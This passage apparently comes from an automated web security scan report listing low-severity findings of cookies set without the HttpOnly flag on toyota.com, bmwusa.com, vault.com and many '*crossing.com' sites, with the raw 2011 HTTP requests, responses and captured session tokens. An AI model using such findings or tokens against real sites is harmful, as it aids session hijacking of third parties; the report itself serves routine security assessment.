PHPSESSID=240j3fr7u4qsmuqu986njli7d2; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:56 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:56 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.134. http://www.telecomcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.telecomcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=fn27b7rlsvo4speggt7vmuaia6; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:56 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:56 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.135. http://www.toyota.com/byt/pub/init.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/byt/pub/init.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID_BYT=FmnKN5JDVH1LwGnr9JLPLgMFhjMmjSgmvGhSQhD8ths2YbvThLTq!-1855535020; domain=.toyota.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /byt/pub/init.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.136. http://www.toyota.com/owners/apps/maintenance-guides.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/owners/apps/maintenance-guides.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID_TOYOWN=9VDQN5kQdYfg1qSR7WQVZYPcDGvjYgvWpwPrfSKCQSpjkHTx83GN!-1855535020; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /owners/apps/maintenance-guides.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=9VDQN5kQdYfg1qSR7WQVZYPcDGvjYgvWpwPrfSKCQSpjkHTx83GN!-1855535020; path=/
Content-Length: 68207

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

10.137. http://www.toyota.com/owners/apps/manuals.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/owners/apps/manuals.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID_TOYOWN=1Sj1N5kMLqJFM9x2lj1kLYDzLBh9Mv9Gd012173rFkJNpmlgpGy5!1573505837; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /owners/apps/manuals.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=1Sj1N5kMLqJFM9x2lj1kLYDzLBh9Mv9Gd012173rFkJNpmlgpGy5!1573505837; path=/
Content-Length: 34028

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

10.138. http://www.tradingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tradingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=pce4hd53hci195b2auvv59a984; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:47 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.139. http://www.trainingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trainingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=0n2gu3r3aojtk5vp93nt6cf8v7; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:41 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:41 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.140. http://www.transportationcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.transportationcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=881r6dutr10j1cvgkdbt4hp5m4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:22 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.141. http://www.travelingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.travelingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=n1fl3n2dn89nmcpmn2rdp35b86; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:22 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.142. http://www.truckingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.truckingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=9omtff16do0dj8ujh5beudm8q4; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:38 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:38 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.143. http://www.tvcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tvcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=4enm9d2hf1rq1gm38rib9qh690; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:06 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:06 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.144. http://www.underwritingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.underwritingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=0or8bng4g6nt9r0eep9e4acqb4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:51 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:51 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.145. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.vault.com
Path:	/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.146. http://www.veterinarycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.veterinarycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=2mcsndiuf3f4gj6u05hhg3jfj5; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:47 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:22:47 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.147. http://www.volunteercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.volunteercrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=g51vkhrfm2pue55e02ud4e5mi3; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:21 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:24:21 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:21 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.148. http://www.workathomecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.workathomecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=3slq9onb09lnusoc4dh32k8bf6; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:39 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:43:39 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:39 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.149. http://www.writingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.writingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=2o6rg0j8fbtu2n6kkit7kt2526; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.150. http://www.bmwusa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CHECK=XP9y6GTRm#@U; expires=Fri, 21-Jan-2011 19:22:50 GMT; path=/
NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error_Cookieless.aspx?DesiredUrl=/&Scheme=http
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:50 GMT
Connection: close
Set-Cookie: CHECK=XP9y6GTRm#@U; expires=Fri, 21-Jan-2011 19:22:50 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError_Cookieless.aspx%3fDesiredUrl%3d%2f%26Scheme%3dhttp">here</a>.</h2>
</body></html>

10.151. http://www.bmwusa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; expires=Mon, 21-Jan-3011 19:21:50 GMT; path=/
NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

10.152. http://www.bmwusa.com/Error_Cookieless.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/Error_Cookieless.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; path=/
LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; expires=Wed, 21-Jan-2015 19:21:50 GMT; path=/
NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Error_Cookieless.aspx?enc=1PNYPTw66BKqkJk7zHuE3g3WVo1ROm+FL0P1g3W9VCY= HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; NSC_CNX_21529_64.29.204.16=4f52b42b3660

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.bmwusa.com/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 139
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:50 GMT
Connection: close
Set-Cookie: WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; path=/
Set-Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; expires=Wed, 21-Jan-2015 19:21:50 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:50 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bmwusa.com/">here</a>.</h2>
</body></html>

10.153. http://www.bmwusa.com/ScriptResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:52 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScriptResource.axd?d=2F-AOzd2Y0PGRp8jK9vbRsOl6-Ldm8Szp0KyHdAli9fpF06wWJJGdEV7HBvTksG9wVa5qC80I78oFjPKinNA8BW4fXH-1aOwrNo8JOflEl09yMuo9lbK70TdKC4GQZKbSB2OU7nNOFZbHv1Q4QaUsmJhLqUOs3OFV_6JRC3kRT7JFwM30&t=218408d1 HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/x-javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:21:52 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:52 GMT;path=/
Content-Length: 32229

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...

10.154. http://www.bmwusa.com/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:52 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=ZCit8Gm9Dm66VElz-Dlx7uNapXPkA4epDI8AMwu3sVIkDC0fSDwQQvsa6O8fmHTyDoiwD63Zl_78HL2Qp1KFWorQ7nM1&t=634222732007903694 HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Referer: http://www.bmwusa.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CHECK=XP9y6GTRm#@U; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 20794
Content-Type: application/x-javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 21 Jan 2011 19:21:52 GMT
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:41:52 GMT;path=/

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

10.155. http://www.bmwusa.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:42:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:02:18 GMT;path=/
Content-Length: 205829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.156. http://www.bmwusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 19:42:05 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bmwusa.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
